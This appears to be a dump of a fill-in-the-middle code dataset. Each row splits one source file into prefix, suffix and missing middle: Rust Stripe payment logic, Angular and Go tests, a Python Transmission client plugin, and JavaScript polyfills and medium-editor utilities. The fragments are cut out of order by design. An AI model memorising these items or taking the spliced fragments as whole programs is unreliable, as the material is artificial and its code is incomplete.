file_name
stringlengths 3
137
| prefix
stringlengths 0
918k
| suffix
stringlengths 0
962k
| middle
stringlengths 0
812k
|
---|---|---|---|
payments.rs | use crate::db;
use crate::is_test;
use crate::models::{NewPayment, Payment, UpdateUser};
use crate::stripe_types::*;
use crate::telegram_types::SuccessfulPayment;
use chrono::{Duration, Utc};
use diesel::pg::data_types::PgTimestamp;
use diesel::pg::types::money::PgMoney;
use reqwest::blocking::Client;
pub fn pay(
successful_payment: &SuccessfulPayment,
conn: db::UserDbConn,
) -> Result<(), reqwest::Error> {
// User has successfuly payed, so this fact is saved
let payment = persist_payment(successful_payment, &conn);
let stripe_token_str = if is_test() {
"STRIPE_TOKEN_TEST"
} else | ;
let stripe_token = std::env::var(stripe_token_str).unwrap();
let client = Client::builder().build()?;
let balance = get_balance(&client, &stripe_token)?;
let pending_amount = balance.pending.first().unwrap().amount;
let charge = get_charge_by_payment(&successful_payment, &client, &stripe_token)?;
let transfer_amount = charge.balance_transaction.net;
// Check current available balance to be sure, that transfer-amount is covered
if pending_amount > transfer_amount {
let payment_intent = payment_intent_request(&client, &stripe_token, transfer_amount)?;
let confirm_payment = confirm_payment(&payment_intent.id, &client, &stripe_token);
match confirm_payment {
Ok(confirmed) => set_transfer_id_on_payment(payment.id, &confirmed.id, &conn),
Err(e) => eprintln!("Payment could not be transfered. Err: {}", e),
}
let reduced_balance = get_balance(&client, &stripe_token)?;
let pending_amount_reduced = reduced_balance.pending.first().unwrap().amount;
if pending_amount_reduced != pending_amount - transfer_amount {
println!(
"reduced_balance {:?} is NOT EQUAL to pending_amount {:?} - transfer_amount {:?}",
pending_amount_reduced, pending_amount, transfer_amount
);
}
}
Ok(())
}
fn persist_payment(successful_payment: &SuccessfulPayment, conn: &db::UserDbConn) -> Payment {
let payload = successful_payment.get_payload();
let last_paid = (Utc::now() + Duration::hours(2)).timestamp();
let new_last_total = payload.total;
let total = payload.totals_sum + new_last_total;
let mut update_user = UpdateUser::default();
update_user.last_paid = Some(PgTimestamp(last_paid));
update_user.last_total = Some(PgMoney(new_last_total));
update_user.total = Some(PgMoney(total));
update_user.drink_count = Some(0);
db::update_user(payload.user_id, &update_user, &conn);
let new_payment = NewPayment {
user_id: payload.user_id,
receipt_identifier: &successful_payment.provider_payment_charge_id,
payed_amount: PgMoney(payload.total),
payed_at: PgTimestamp(last_paid),
};
db::save_payment(new_payment, &conn)
}
fn payment_intent_request(
client: &Client,
token: &str,
amount: i32,
) -> Result<PaymentIntent, reqwest::Error> {
let destination_account = std::env::var("DESTINATION").unwrap();
let payment_intent_forminfo = &[
("payment_method_types[]", "card"),
("amount", &amount.to_string()),
("currency", "eur"),
("transfer_data[destination]", &destination_account),
];
client
.post("https://api.stripe.com/v1/payment_intents")
.bearer_auth(&token)
.form(payment_intent_forminfo)
.send()?
.json::<PaymentIntent>()
}
fn confirm_payment(
payment_id: &str,
client: &Client,
token: &str,
) -> Result<PaymentConfirmation, reqwest::Error> {
let confirm_payment_endpoint = format!(
"https://api.stripe.com/v1/payment_intents/{}/confirm",
payment_id
);
client
.post(&confirm_payment_endpoint)
.bearer_auth(&token)
// TODO: Use actual card-information
.form(&[("payment_method", "pm_card_visa")])
.send()?
.json::<PaymentConfirmation>()
}
pub fn get_balance(client: &Client, token: &str) -> Result<Balance, reqwest::Error> {
client
.get("https://api.stripe.com/v1/balance")
.bearer_auth(token)
.send()?
.json::<Balance>()
}
pub fn get_charge_by_payment(
successful_payment: &SuccessfulPayment,
client: &Client,
token: &str,
) -> Result<ChargeResponse, reqwest::Error> {
let charge_endpoint = format!(
"https://api.stripe.com/v1/charges/{}",
successful_payment.provider_payment_charge_id
);
client
.get(&charge_endpoint)
.bearer_auth(token)
.form(&[("expand[]", "balance_transaction")])
.send()?
.json::<ChargeResponse>()
}
fn set_transfer_id_on_payment(payment_id: i32, transfer_id: &str, conn: &db::UserDbConn) {
db::save_transfer_id(payment_id, transfer_id, conn);
}
// Helpers
pub fn money_in_eur(money: i64) -> f32 {
money as f32 / 100.00
}
pub fn calc_stripe_fee(damage: i64) -> i32 {
let fee_percentage = if is_test() { 0.029 } else { 0.014 };
let fee_fix_amount = 0.25;
let raw_damage = money_in_eur(damage);
let total_damage = raw_damage * fee_percentage + fee_fix_amount;
(total_damage * 100_f32) as i32
}
| {
"STRIPE_TOKEN"
} |
request-manager-modal.component.spec.ts | import { async, ComponentFixture, TestBed } from '@angular/core/testing';
import { RequestManagerModalComponent } from './request-manager-component.component'; |
beforeEach(async(() => {
TestBed.configureTestingModule({
declarations: [ RequestManagerModalComponent ]
})
.compileComponents();
}));
beforeEach(() => {
fixture = TestBed.createComponent(RequestManagerModalComponent);
component = fixture.componentInstance;
fixture.detectChanges();
});
it('should create', () => {
expect(component).toBeTruthy();
});
}); |
describe('RequestManagerModalComponent', () => {
let component: RequestManagerModalComponent;
let fixture: ComponentFixture<RequestManagerModalComponent>; |
support.rs | pub fn test_init() { | let _ = flexi_logger::Logger::with_str("info").start();
} | |
video_repository_test.go | package repositories_test
import (
"github.com/google/uuid"
"github.com/stretchr/testify/require"
"github.com/tonnytg/encoder-video-go/application/repositories"
"github.com/tonnytg/encoder-video-go/domain"
"github.com/tonnytg/encoder-video-go/framework/database"
"testing"
"time"
)
func | (t *testing.T) {
db := database.NewDbTest()
defer db.Close()
video := domain.NewVideo()
video.ID = uuid.New().String()
video.FilePath = "path"
video.CreateAt = time.Now()
repo := repositories.VideoRepositoryDb{Db: db}
repo.Insert(video)
v, err := repo.Find(video.ID)
require.NotEmpty(t, v.ID)
require.Nil(t, err)
require.Equal(t, v.ID, video.ID)
}
| TestVideoRepositoryDbInsert |
transmission.py | import six
import transmissionrpc
from pytz import reference, utc
from sqlalchemy import Column, Integer, String
from monitorrent.db import Base, DBSession
from monitorrent.plugin_managers import register_plugin
import base64
class TransmissionCredentials(Base):
__tablename__ = "transmission_credentials"
id = Column(Integer, primary_key=True)
host = Column(String, nullable=False)
port = Column(Integer, nullable=False)
username = Column(String, nullable=True)
password = Column(String, nullable=True)
class TransmissionClientPlugin(object):
name = "transmission"
form = [{
'type': 'row',
'content': [{
'type': 'text',
'label': 'Host',
'model': 'host',
'flex': 80
}, {
'type': 'text',
'label': 'Port',
'model': 'port',
'flex': 20
}]
}, {
'type': 'row',
'content': [{
'type': 'text',
'label': 'Username',
'model': 'username',
'flex': 50
}, {
'type': 'password',
'label': 'Password',
'model': 'password',
'flex': 50
}]
}]
DEFAULT_PORT = 9091
SUPPORTED_FIELDS = ['download_dir']
def get_settings(self):
with DBSession() as db:
cred = db.query(TransmissionCredentials).first()
if not cred:
return None
return {'host': cred.host, 'port': cred.port, 'username': cred.username}
def set_settings(self, settings):
with DBSession() as db:
cred = db.query(TransmissionCredentials).first()
if not cred:
cred = TransmissionCredentials()
db.add(cred)
cred.host = settings['host']
cred.port = settings.get('port', self.DEFAULT_PORT)
cred.username = settings.get('username', None)
cred.password = settings.get('password', None)
def check_connection(self):
with DBSession() as db:
cred = db.query(TransmissionCredentials).first()
if not cred:
return False
client = transmissionrpc.Client(address=cred.host, port=cred.port,
user=cred.username, password=cred.password)
return client
def find_torrent(self, torrent_hash):
client = self.check_connection()
if not client:
return False
try:
torrent = client.get_torrent(torrent_hash.lower(), ['id', 'hashString', 'addedDate', 'name'])
return {
"name": torrent.name,
"date_added": torrent.date_added.replace(tzinfo=reference.LocalTimezone()).astimezone(utc)
}
except KeyError:
return False
def get_download_dir(self):
client = self.check_connection()
if not client:
return None
session = client.get_session()
return six.text_type(session.download_dir)
def add_torrent(self, torrent, torrent_settings):
"""
:type torrent: str
:type torrent_settings: clients.TopicSettings | None
"""
client = self.check_connection()
if not client:
return False
torrent_settings_dict = {}
if torrent_settings is not None:
if torrent_settings.download_dir is not None:
torrent_settings_dict['download_dir'] = torrent_settings.download_dir
client.add_torrent(base64.b64encode(torrent).decode('utf-8'), **torrent_settings_dict)
return True
def remove_torrent(self, torrent_hash):
client = self.check_connection()
if not client:
return False
client.remove_torrent(torrent_hash.lower(), delete_data=False)
return True | register_plugin('client', 'transmission', TransmissionClientPlugin()) | |
default_type_clause.rs | use crate::{FormatElement, FormatResult, Formatter, ToFormatElement};
use rslint_parser::{ast::TsDefaultTypeClause, AstNode};
impl ToFormatElement for TsDefaultTypeClause {
fn | (&self, formatter: &Formatter) -> FormatResult<FormatElement> {
Ok(formatter.format_verbatim(self.syntax()))
}
}
| to_format_element |
medium-editor.js | /*global self, document, DOMException */
/*! @source http://purl.eligrey.com/github/classList.js/blob/master/classList.js */
// Full polyfill for browsers with no classList support
if (!("classList" in document.createElement("_"))) {
(function (view) {
"use strict";
if (!('Element' in view)) return;
var
classListProp = "classList"
, protoProp = "prototype"
, elemCtrProto = view.Element[protoProp]
, objCtr = Object
, strTrim = String[protoProp].trim || function () {
return this.replace(/^\s+|\s+$/g, "");
}
, arrIndexOf = Array[protoProp].indexOf || function (item) {
var
i = 0
, len = this.length
;
for (; i < len; i++) {
if (i in this && this[i] === item) {
return i;
}
}
return -1;
}
// Vendors: please allow content code to instantiate DOMExceptions
, DOMEx = function (type, message) {
this.name = type;
this.code = DOMException[type];
this.message = message;
}
, checkTokenAndGetIndex = function (classList, token) {
if (token === "") {
throw new DOMEx(
"SYNTAX_ERR"
, "An invalid or illegal string was specified"
);
}
if (/\s/.test(token)) {
throw new DOMEx(
"INVALID_CHARACTER_ERR"
, "String contains an invalid character"
);
}
return arrIndexOf.call(classList, token);
}
, ClassList = function (elem) {
var
trimmedClasses = strTrim.call(elem.getAttribute("class") || "")
, classes = trimmedClasses ? trimmedClasses.split(/\s+/) : []
, i = 0
, len = classes.length
;
for (; i < len; i++) {
this.push(classes[i]);
}
this._updateClassName = function () {
elem.setAttribute("class", this.toString());
};
}
, classListProto = ClassList[protoProp] = []
, classListGetter = function () {
return new ClassList(this);
}
;
// Most DOMException implementations don't allow calling DOMException's toString()
// on non-DOMExceptions. Error's toString() is sufficient here.
DOMEx[protoProp] = Error[protoProp];
classListProto.item = function (i) {
return this[i] || null;
};
classListProto.contains = function (token) {
token += "";
return checkTokenAndGetIndex(this, token) !== -1;
};
classListProto.add = function () {
var
tokens = arguments
, i = 0
, l = tokens.length
, token
, updated = false
;
do {
token = tokens[i] + "";
if (checkTokenAndGetIndex(this, token) === -1) {
this.push(token);
updated = true;
}
}
while (++i < l);
if (updated) {
this._updateClassName();
}
};
classListProto.remove = function () {
var
tokens = arguments
, i = 0
, l = tokens.length
, token
, updated = false
, index
;
do {
token = tokens[i] + "";
index = checkTokenAndGetIndex(this, token);
while (index !== -1) {
this.splice(index, 1);
updated = true;
index = checkTokenAndGetIndex(this, token);
}
}
while (++i < l);
if (updated) {
this._updateClassName();
}
};
classListProto.toggle = function (token, force) {
token += "";
var
result = this.contains(token)
, method = result ?
force !== true && "remove"
:
force !== false && "add"
;
if (method) {
this[method](token);
}
if (force === true || force === false) {
return force;
} else {
return !result;
}
};
classListProto.toString = function () {
return this.join(" ");
};
if (objCtr.defineProperty) {
var classListPropDesc = {
get: classListGetter
, enumerable: true
, configurable: true
};
try {
objCtr.defineProperty(elemCtrProto, classListProp, classListPropDesc);
} catch (ex) { // IE 8 doesn't support enumerable:true
if (ex.number === -0x7FF5EC54) {
classListPropDesc.enumerable = false;
objCtr.defineProperty(elemCtrProto, classListProp, classListPropDesc);
}
}
} else if (objCtr[protoProp].__defineGetter__) {
elemCtrProto.__defineGetter__(classListProp, classListGetter);
}
}(self));
}
/* Blob.js
* A Blob implementation.
* 2014-07-24
*
* By Eli Grey, http://eligrey.com
* By Devin Samarin, https://github.com/dsamarin
* License: X11/MIT
* See https://github.com/eligrey/Blob.js/blob/master/LICENSE.md
*/
/*global self, unescape */
/*jslint bitwise: true, regexp: true, confusion: true, es5: true, vars: true, white: true,
plusplus: true */
/*! @source http://purl.eligrey.com/github/Blob.js/blob/master/Blob.js */
(function (view) {
"use strict";
view.URL = view.URL || view.webkitURL;
if (view.Blob && view.URL) {
try {
new Blob;
return;
} catch (e) {}
}
// Internally we use a BlobBuilder implementation to base Blob off of
// in order to support older browsers that only have BlobBuilder
var BlobBuilder = view.BlobBuilder || view.WebKitBlobBuilder || view.MozBlobBuilder || (function(view) {
var
get_class = function(object) {
return Object.prototype.toString.call(object).match(/^\[object\s(.*)\]$/)[1];
}
, FakeBlobBuilder = function BlobBuilder() {
this.data = [];
}
, FakeBlob = function Blob(data, type, encoding) {
this.data = data;
this.size = data.length;
this.type = type;
this.encoding = encoding;
}
, FBB_proto = FakeBlobBuilder.prototype
, FB_proto = FakeBlob.prototype
, FileReaderSync = view.FileReaderSync
, FileException = function(type) {
this.code = this[this.name = type];
}
, file_ex_codes = (
"NOT_FOUND_ERR SECURITY_ERR ABORT_ERR NOT_READABLE_ERR ENCODING_ERR "
+ "NO_MODIFICATION_ALLOWED_ERR INVALID_STATE_ERR SYNTAX_ERR"
).split(" ")
, file_ex_code = file_ex_codes.length
, real_URL = view.URL || view.webkitURL || view
, real_create_object_URL = real_URL.createObjectURL
, real_revoke_object_URL = real_URL.revokeObjectURL
, URL = real_URL
, btoa = view.btoa
, atob = view.atob
, ArrayBuffer = view.ArrayBuffer
, Uint8Array = view.Uint8Array
, origin = /^[\w-]+:\/*\[?[\w\.:-]+\]?(?::[0-9]+)?/
;
FakeBlob.fake = FB_proto.fake = true;
while (file_ex_code--) {
FileException.prototype[file_ex_codes[file_ex_code]] = file_ex_code + 1;
}
// Polyfill URL
if (!real_URL.createObjectURL) {
URL = view.URL = function(uri) {
var
uri_info = document.createElementNS("http://www.w3.org/1999/xhtml", "a")
, uri_origin
;
uri_info.href = uri;
if (!("origin" in uri_info)) {
if (uri_info.protocol.toLowerCase() === "data:") {
uri_info.origin = null;
} else {
uri_origin = uri.match(origin);
uri_info.origin = uri_origin && uri_origin[1];
}
}
return uri_info;
};
}
URL.createObjectURL = function(blob) {
var
type = blob.type
, data_URI_header
;
if (type === null) {
type = "application/octet-stream";
}
if (blob instanceof FakeBlob) {
data_URI_header = "data:" + type;
if (blob.encoding === "base64") {
return data_URI_header + ";base64," + blob.data;
} else if (blob.encoding === "URI") {
return data_URI_header + "," + decodeURIComponent(blob.data);
} if (btoa) {
return data_URI_header + ";base64," + btoa(blob.data);
} else {
return data_URI_header + "," + encodeURIComponent(blob.data);
}
} else if (real_create_object_URL) {
return real_create_object_URL.call(real_URL, blob);
}
};
URL.revokeObjectURL = function(object_URL) {
if (object_URL.substring(0, 5) !== "data:" && real_revoke_object_URL) {
real_revoke_object_URL.call(real_URL, object_URL);
}
};
FBB_proto.append = function(data/*, endings*/) {
var bb = this.data;
// decode data to a binary string
if (Uint8Array && (data instanceof ArrayBuffer || data instanceof Uint8Array)) {
var
str = ""
, buf = new Uint8Array(data)
, i = 0
, buf_len = buf.length
;
for (; i < buf_len; i++) {
str += String.fromCharCode(buf[i]);
}
bb.push(str);
} else if (get_class(data) === "Blob" || get_class(data) === "File") {
if (FileReaderSync) {
var fr = new FileReaderSync;
bb.push(fr.readAsBinaryString(data));
} else {
// async FileReader won't work as BlobBuilder is sync
throw new FileException("NOT_READABLE_ERR");
}
} else if (data instanceof FakeBlob) {
if (data.encoding === "base64" && atob) {
bb.push(atob(data.data));
} else if (data.encoding === "URI") {
bb.push(decodeURIComponent(data.data));
} else if (data.encoding === "raw") {
bb.push(data.data);
}
} else {
if (typeof data !== "string") {
data += ""; // convert unsupported types to strings
}
// decode UTF-16 to binary string
bb.push(unescape(encodeURIComponent(data)));
}
};
FBB_proto.getBlob = function(type) {
if (!arguments.length) {
type = null;
}
return new FakeBlob(this.data.join(""), type, "raw");
};
FBB_proto.toString = function() {
return "[object BlobBuilder]";
};
FB_proto.slice = function(start, end, type) {
var args = arguments.length;
if (args < 3) {
type = null;
}
return new FakeBlob(
this.data.slice(start, args > 1 ? end : this.data.length)
, type
, this.encoding
);
};
FB_proto.toString = function() {
return "[object Blob]";
};
FB_proto.close = function() {
this.size = 0;
delete this.data;
};
return FakeBlobBuilder;
}(view));
view.Blob = function(blobParts, options) {
var type = options ? (options.type || "") : "";
var builder = new BlobBuilder();
if (blobParts) {
for (var i = 0, len = blobParts.length; i < len; i++) {
if (Uint8Array && blobParts[i] instanceof Uint8Array) {
builder.append(blobParts[i].buffer);
}
else {
builder.append(blobParts[i]);
}
}
}
var blob = builder.getBlob(type);
if (!blob.slice && blob.webkitSlice) {
blob.slice = blob.webkitSlice;
}
return blob;
};
var getPrototypeOf = Object.getPrototypeOf || function(object) {
return object.__proto__;
};
view.Blob.prototype = getPrototypeOf(new view.Blob());
}(typeof self !== "undefined" && self || typeof window !== "undefined" && window || this.content || this));
(function (root, factory) {
'use strict';
if (typeof module === 'object') {
module.exports = factory;
} else if (typeof define === 'function' && define.amd) {
define(function () {
return factory;
});
} else {
root.MediumEditor = factory;
}
}(this, function () {
'use strict';
var Util;
(function (window) {
'use strict';
// Params: Array, Boolean, Object
function getProp(parts, create, context) {
if (!context) {
context = window;
}
try {
for (var i = 0; i < parts.length; i++) {
var p = parts[i];
if (!(p in context)) {
if (create) {
context[p] = {};
} else {
return;
}
}
context = context[p];
}
return context;
} catch (e) {
// 'p in context' throws an exception when context is a number, boolean, etc. rather than an object,
// so in that corner case just return undefined (by having no return statement)
}
}
function copyInto(overwrite, dest) {
var prop,
sources = Array.prototype.slice.call(arguments, 2);
dest = dest || {};
for (var i = 0; i < sources.length; i++) {
var source = sources[i];
if (source) {
for (prop in source) {
if (source.hasOwnProperty(prop) &&
typeof source[prop] !== 'undefined' &&
(overwrite || dest.hasOwnProperty(prop) === false)) {
dest[prop] = source[prop];
}
}
}
}
return dest;
}
Util = {
// http://stackoverflow.com/questions/17907445/how-to-detect-ie11#comment30165888_17907562
// by rg89
isIE: ((navigator.appName === 'Microsoft Internet Explorer') || ((navigator.appName === 'Netscape') && (new RegExp('Trident/.*rv:([0-9]{1,}[.0-9]{0,})').exec(navigator.userAgent) !== null))),
// https://github.com/jashkenas/underscore
keyCode: {
BACKSPACE: 8,
TAB: 9,
ENTER: 13,
ESCAPE: 27,
SPACE: 32,
DELETE: 46
},
parentElements: ['p', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'blockquote', 'pre'],
extend: function extend(/* dest, source1, source2, ...*/) {
var args = [true].concat(Array.prototype.slice.call(arguments));
return copyInto.apply(this, args);
},
defaults: function defaults(/*dest, source1, source2, ...*/) {
var args = [false].concat(Array.prototype.slice.call(arguments));
return copyInto.apply(this, args);
},
derives: function derives(base, derived) {
var origPrototype = derived.prototype;
function Proto() { }
Proto.prototype = base.prototype;
derived.prototype = new Proto();
derived.prototype.constructor = base;
derived.prototype = copyInto(false, derived.prototype, origPrototype);
return derived;
},
// Find the next node in the DOM tree that represents any text that is being
// displayed directly next to the targetNode (passed as an argument)
// Text that appears directly next to the current node can be:
// - A sibling text node
// - A descendant of a sibling element
// - A sibling text node of an ancestor
// - A descendant of a sibling element of an ancestor
findAdjacentTextNodeWithContent: function findAdjacentTextNodeWithContent(rootNode, targetNode, ownerDocument) {
var pastTarget = false,
nextNode,
nodeIterator = ownerDocument.createNodeIterator(rootNode, NodeFilter.SHOW_TEXT, null, false);
// Use a native NodeIterator to iterate over all the text nodes that are descendants
// of the rootNode. Once past the targetNode, choose the first non-empty text node
nextNode = nodeIterator.nextNode();
while (nextNode) {
if (nextNode === targetNode) {
pastTarget = true;
} else if (pastTarget) {
if (nextNode.nodeType === 3 && nextNode.nodeValue && nextNode.nodeValue.trim().length > 0) {
break;
}
}
nextNode = nodeIterator.nextNode();
}
return nextNode;
},
isDescendant: function isDescendant(parent, child, checkEquality) {
if (!parent || !child) {
return false;
}
if (checkEquality && parent === child) {
return true;
}
var node = child.parentNode;
while (node !== null) {
if (node === parent) {
return true;
}
node = node.parentNode;
}
return false;
},
// https://github.com/jashkenas/underscore
isElement: function isElement(obj) {
return !!(obj && obj.nodeType === 1);
},
now: Date.now,
// https://github.com/jashkenas/underscore
throttle: function (func, wait) {
var THROTTLE_INTERVAL = 50,
context,
args,
result,
timeout = null,
previous = 0,
later = function () {
previous = Date.now();
timeout = null;
result = func.apply(context, args);
if (!timeout) {
context = args = null;
}
};
if (!wait && wait !== 0) {
wait = THROTTLE_INTERVAL;
}
return function () {
var now = Date.now(),
remaining = wait - (now - previous);
context = this;
args = arguments;
if (remaining <= 0 || remaining > wait) {
if (timeout) {
clearTimeout(timeout);
timeout = null;
}
previous = now;
result = func.apply(context, args);
if (!timeout) {
context = args = null;
}
} else if (!timeout) {
timeout = setTimeout(later, remaining);
}
return result;
};
},
traverseUp: function (current, testElementFunction) {
if (!current) {
return false;
}
do {
if (current.nodeType === 1) {
if (testElementFunction(current)) {
return current;
}
// do not traverse upwards past the nearest containing editor
if (current.getAttribute('data-medium-element')) {
return false;
}
}
current = current.parentNode;
} while (current);
return false;
},
htmlEntities: function (str) {
// converts special characters (like <) into their escaped/encoded values (like <).
// This allows you to show to display the string without the browser reading it as HTML.
return String(str).replace(/&/g, '&').replace(/</g, '<').replace(/>/g, '>').replace(/"/g, '"');
},
// http://stackoverflow.com/questions/6690752/insert-html-at-caret-in-a-contenteditable-div
insertHTMLCommand: function (doc, html) {
var selection, range, el, fragment, node, lastNode, toReplace;
if (doc.queryCommandSupported('insertHTML')) {
try {
return doc.execCommand('insertHTML', false, html);
} catch (ignore) {}
}
selection = doc.defaultView.getSelection();
if (selection.getRangeAt && selection.rangeCount) {
range = selection.getRangeAt(0);
toReplace = range.commonAncestorContainer;
// Ensure range covers maximum amount of nodes as possible
// By moving up the DOM and selecting ancestors whose only child is the range
if ((toReplace.nodeType === 3 && toReplace.nodeValue === range.toString()) ||
(toReplace.nodeType !== 3 && toReplace.innerHTML === range.toString())) {
while (toReplace.parentNode &&
toReplace.parentNode.childNodes.length === 1 &&
!toReplace.parentNode.getAttribute('data-medium-element')) {
toReplace = toReplace.parentNode;
}
range.selectNode(toReplace);
}
range.deleteContents();
el = doc.createElement('div');
el.innerHTML = html;
fragment = doc.createDocumentFragment();
while (el.firstChild) {
node = el.firstChild;
lastNode = fragment.appendChild(node);
}
range.insertNode(fragment);
// Preserve the selection:
if (lastNode) {
range = range.cloneRange();
range.setStartAfter(lastNode);
range.collapse(true);
selection.removeAllRanges();
selection.addRange(range);
}
}
},
getSelectionRange: function (ownerDocument) {
var selection = ownerDocument.getSelection();
if (selection.rangeCount === 0) {
return null;
}
return selection.getRangeAt(0);
},
// http://stackoverflow.com/questions/1197401/how-can-i-get-the-element-the-caret-is-in-with-javascript-when-using-contentedi
// by You
getSelectionStart: function (ownerDocument) {
var node = ownerDocument.getSelection().anchorNode,
startNode = (node && node.nodeType === 3 ? node.parentNode : node);
return startNode;
},
getSelectionData: function (el) {
var tagName;
if (el && el.tagName) {
tagName = el.tagName.toLowerCase();
}
while (el && this.parentElements.indexOf(tagName) === -1) {
el = el.parentNode;
if (el && el.tagName) {
tagName = el.tagName.toLowerCase();
}
}
return {
el: el,
tagName: tagName
};
},
execFormatBlock: function (doc, tagName) {
var selectionData = this.getSelectionData(this.getSelectionStart(doc));
// FF handles blockquote differently on formatBlock
// allowing nesting, we need to use outdent
// https://developer.mozilla.org/en-US/docs/Rich-Text_Editing_in_Mozilla
if (tagName === 'blockquote' && selectionData.el &&
selectionData.el.parentNode.tagName.toLowerCase() === 'blockquote') {
return doc.execCommand('outdent', false, null);
}
if (selectionData.tagName === tagName) {
tagName = 'p';
}
// When IE we need to add <> to heading elements and
// blockquote needs to be called as indent
// http://stackoverflow.com/questions/10741831/execcommand-formatblock-headings-in-ie
// http://stackoverflow.com/questions/1816223/rich-text-editor-with-blockquote-function/1821777#1821777
if (this.isIE) {
if (tagName === 'blockquote') {
return doc.execCommand('indent', false, tagName);
}
tagName = '<' + tagName + '>';
}
return doc.execCommand('formatBlock', false, tagName);
},
// TODO: not sure if this should be here
setTargetBlank: function (el) {
var i;
if (el.tagName.toLowerCase() === 'a') {
el.target = '_blank';
} else {
el = el.getElementsByTagName('a');
for (i = 0; i < el.length; i += 1) {
el[i].target = '_blank';
}
}
},
addClassToAnchors: function (el, buttonClass) {
var classes = buttonClass.split(' '),
i,
j;
if (el.tagName.toLowerCase() === 'a') {
for (j = 0; j < classes.length; j += 1) {
el.classList.add(classes[j]);
}
} else {
el = el.getElementsByTagName('a');
for (i = 0; i < el.length; i += 1) {
for (j = 0; j < classes.length; j += 1) {
el[i].classList.add(classes[j]);
}
}
}
},
isListItem: function (node) {
if (!node) {
return false;
}
if (node.tagName.toLowerCase() === 'li') {
return true;
}
var parentNode = node.parentNode,
tagName = parentNode.tagName.toLowerCase();
while (this.parentElements.indexOf(tagName) === -1 && tagName !== 'div') {
if (tagName === 'li') {
return true;
}
parentNode = parentNode.parentNode;
if (parentNode && parentNode.tagName) {
tagName = parentNode.tagName.toLowerCase();
} else {
return false;
}
}
return false;
},
cleanListDOM: function (element) {
if (element.tagName.toLowerCase() === 'li') {
var list = element.parentElement;
if (list.parentElement.tagName.toLowerCase() === 'p') { // yes we need to clean up
this.unwrapElement(list.parentElement);
}
}
},
unwrapElement: function (element) {
var parent = element.parentNode,
current = element.firstChild,
next;
do {
next = current.nextSibling;
parent.insertBefore(current, element);
current = next;
} while (current);
parent.removeChild(element);
},
warn: function () {
if (window.console !== undefined && typeof window.console.warn === 'function') {
window.console.warn.apply(console, arguments);
}
},
deprecated: function (oldName, newName, version) {
// simple deprecation warning mechanism.
var m = oldName + ' is deprecated, please use ' + newName + ' instead.';
if (version) {
m += ' Will be removed in ' + version;
}
Util.warn(m);
},
deprecatedMethod: function (oldName, newName, args, version) {
// run the replacement and warn when someone calls a deprecated method
Util.deprecated(oldName, newName, version);
if (typeof this[newName] === 'function') {
this[newName].apply(this, args);
}
},
cleanupAttrs: function (el, attrs) {
attrs.forEach(function (attr) {
el.removeAttribute(attr);
});
},
cleanupTags: function (el, tags) {
tags.forEach(function (tag) {
if (el.tagName.toLowerCase() === tag) {
el.parentNode.removeChild(el);
}
}, this);
},
getClosestTag: function (el, tag) { // get the closest parent
return Util.traverseUp(el, function (element) {
return element.tagName.toLowerCase() === tag.toLowerCase();
});
},
unwrap: function (el, doc) {
var fragment = doc.createDocumentFragment();
for (var i = 0; i < el.childNodes.length; i++) {
fragment.appendChild(el.childNodes[i]);
}
if (fragment.childNodes.length) {
el.parentNode.replaceChild(fragment, el);
} else {
el.parentNode.removeChild(el);
}
},
setObject: function (name, value, context) {
// summary:
// Set a property from a dot-separated string, such as 'A.B.C'
var parts = name.split('.'),
p = parts.pop(),
obj = getProp(parts, true, context);
return obj && p ? (obj[p] = value) : undefined; // Object
},
getObject: function (name, create, context) {
// summary:
// Get a property from a dot-separated string, such as 'A.B.C'
return getProp(name ? name.split('.') : [], create, context); // Object
}
};
}(window));
var ButtonsData;
(function () {
'use strict';
ButtonsData = {
'bold': {
name: 'bold',
action: 'bold',
aria: 'bold',
tagNames: ['b', 'strong'],
style: {
prop: 'font-weight',
value: '700|bold'
},
useQueryState: true,
contentDefault: '<b>B</b>',
contentFA: '<i class="fa fa-bold"></i>',
key: 'b'
},
'italic': {
name: 'italic',
action: 'italic',
aria: 'italic',
tagNames: ['i', 'em'],
style: {
prop: 'font-style',
value: 'italic'
},
useQueryState: true,
contentDefault: '<b><i>I</i></b>',
contentFA: '<i class="fa fa-italic"></i>',
key: 'i'
},
'underline': {
name: 'underline',
action: 'underline',
aria: 'underline',
tagNames: ['u'],
style: {
prop: 'text-decoration',
value: 'underline'
},
useQueryState: true,
contentDefault: '<b><u>U</u></b>',
contentFA: '<i class="fa fa-underline"></i>',
key: 'u'
},
'strikethrough': {
name: 'strikethrough',
action: 'strikethrough',
aria: 'strike through',
tagNames: ['strike'],
style: {
prop: 'text-decoration',
value: 'line-through'
},
useQueryState: true,
contentDefault: '<s>A</s>',
contentFA: '<i class="fa fa-strikethrough"></i>'
},
'superscript': {
name: 'superscript',
action: 'superscript',
aria: 'superscript',
tagNames: ['sup'],
/* firefox doesn't behave the way we want it to, so we CAN'T use queryCommandState for superscript
https://github.com/guardian/scribe/blob/master/BROWSERINCONSISTENCIES.md#documentquerycommandstate */
// useQueryState: true
contentDefault: '<b>x<sup>1</sup></b>',
contentFA: '<i class="fa fa-superscript"></i>'
},
'subscript': {
name: 'subscript',
action: 'subscript',
aria: 'subscript',
tagNames: ['sub'],
/* firefox doesn't behave the way we want it to, so we CAN'T use queryCommandState for subscript
https://github.com/guardian/scribe/blob/master/BROWSERINCONSISTENCIES.md#documentquerycommandstate */
// useQueryState: true
contentDefault: '<b>x<sub>1</sub></b>',
contentFA: '<i class="fa fa-subscript"></i>'
},
'image': {
name: 'image',
action: 'image',
aria: 'image',
tagNames: ['img'],
contentDefault: '<b>image</b>',
contentFA: '<i class="fa fa-picture-o"></i>'
},
'quote': {
name: 'quote',
action: 'append-blockquote',
aria: 'blockquote',
tagNames: ['blockquote'],
contentDefault: '<b>“</b>',
contentFA: '<i class="fa fa-quote-right"></i>'
},
'orderedlist': {
name: 'orderedlist',
action: 'insertorderedlist',
aria: 'ordered list',
tagNames: ['ol'],
useQueryState: true,
contentDefault: '<b>1.</b>',
contentFA: '<i class="fa fa-list-ol"></i>'
},
'unorderedlist': {
name: 'unorderedlist',
action: 'insertunorderedlist',
aria: 'unordered list',
tagNames: ['ul'],
useQueryState: true,
contentDefault: '<b>•</b>',
contentFA: '<i class="fa fa-list-ul"></i>'
},
'pre': {
name: 'pre',
action: 'append-pre',
aria: 'preformatted text',
tagNames: ['pre'],
contentDefault: '<b>0101</b>',
contentFA: '<i class="fa fa-code fa-lg"></i>'
},
'indent': {
name: 'indent',
action: 'indent',
aria: 'indent',
tagNames: [],
contentDefault: '<b>→</b>',
